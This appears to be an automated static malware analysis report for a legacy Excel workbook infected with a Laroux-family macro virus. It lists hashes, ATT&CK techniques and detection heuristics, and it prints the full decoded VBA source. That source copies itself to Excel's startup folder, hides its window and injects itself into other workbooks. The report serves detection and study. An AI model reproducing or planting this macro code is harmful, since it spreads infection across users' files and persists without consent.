Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e4f73b71f6258967…

MALICIOUS

Office (OLE)

89.0 KB Created: 2001-07-07 11:02:23 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 6b8b0f7ea02a0bc4b723212845f40f64 SHA-1: 8247dff3f07c10f3717e1f60addc02c1b3b652d3 SHA-256: e4f73b71f62589676755d6d9d3f59c555d7f37642810f60f2e15d33885f3e85f
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is an Excel 5 macro-virus, identified by the 'LAROUX_MACRO_VIRUS' heuristic. It contains an Auto_Open macro that attempts to copy itself to the Excel startup directory as 'nt².xls' and register itself to run automatically. This indicates a persistence mechanism designed to ensure the macro executes whenever Excel is opened.

Heuristics 3

  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 992 bytes
SHA-256: 988293333aca021b00ff357edb9be3afdd8692a68a0b0d11e8f93f0190dc554c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "nt²"









Private Sub auto_open()
    Application.OnSheetActivate = "SearchSelf"
End Sub

Private Static Sub SearchSelf()
On Error Resume Next
Const Self As String = "nt².xls"
Dim Resident As Boolean, strCurrDir As String

    Application.ScreenUpdating = False
    Resident = Dir(Application.StartupPath & "\" & Self) = Self
    If Resident Then
       If ActiveWorkbook.Sheets(1).Name <> "nt²" Then
           Workbooks(Self).Sheets("nt²").Copy before:=ActiveWorkbook.Sheets(1)
       End If
    Else
        Sheets("nt²").Select: Sheets("nt²").Copy
        strCurrDir = CurDir()
        ChDir Application.StartupPath
        Workbooks(ActiveWorkbook.Name).SaveAs FileName:=Application.StartupPath & "\" & Self
        ChDir strCurrDir
        ActiveWindow.Visible = False
        Workbooks(Self).Save
    End If
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "nt².xls!SearchSelf"
    
End Sub